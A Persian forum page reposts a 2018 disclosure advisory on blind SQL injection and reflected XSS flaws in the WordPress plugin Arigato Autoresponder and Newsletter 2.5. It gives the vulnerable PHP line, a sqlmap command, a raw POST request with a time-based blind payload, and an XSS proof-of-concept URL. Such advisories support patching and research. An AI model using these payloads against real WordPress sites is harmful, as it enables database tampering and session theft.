رفتن به مطلب
سایت با سیستم جدید رونمایی شد همزمان فعالیت سایت از سر گرفته شد...
شروع به فعالیت از سر گرفته شد

پست های پیشنهاد شده



WordPress Arigato Autoresponder And Newsletter 2.5 SQL Injection / XSS


 




Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2018-08-22
CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009]
Download Site: https://wordpress.org/plugins/bft-autoresponder/
Vendor: Kiboko Labs https://calendarscripts.info/
Vendor Notified: 2018-08-22, Fixed v2.5.1.5
Vendor Contact: @prasunsen wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=203
Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date.
Vulnerability:
These vulnerabilities require administrative priveledges to exploit.

CVE-2018-1002000

There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request.

In line 69 of file controllers/list.php:

65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");

del_ids is not sanitized properly.

Nine Reflected XSS.

CVE-2018-1002001

In line 22-23 of controllers/list.php:

22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
23 echo "";

CVE-2018-1002002

bft_list.html.php:28:


CVE-2018-1002003

bft_list.html.php:29:


CVE-2018-1002004

bft_list.html.php:42:


CVE-2018-1002005

bft_list.html.php:43:

CVE-2018-1002006

integration-contact-form.html.php:14: 

 

CVE-2018-1002007

integration-contact-form.html.php:15: 

 

CVE-2018-1002008

list-user.html.php:4: 


CVE-2018-1002009

unsubscribe.html.php:3: 



Exploit Code:
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql

Where post_data is:

POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]


(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [iNFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [iNFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'

[*] shutting down at 11:50:08


CVE-2018-1002001

http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS






لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

Fluid Width

Switch between fixed or fluid width

Sidebar Hide ON/OFF

You can hide or unhide your sidebar whenever you want.

Index Customizer

R
L

Sidebar Position

You can choose the position of sidebar, left or right / [ L ] for left, [ R ] for right.

2
3

Subforum Columns

You can choose how many columns to display your subforums

Y
N

Hide/Unhide Back To Top Button

Chose between display block and none [ Y = Show / N = Hide ]

Color Picker

Background Picker

Template Style Picker

Save
×
×
  • ایجاد مورد جدید...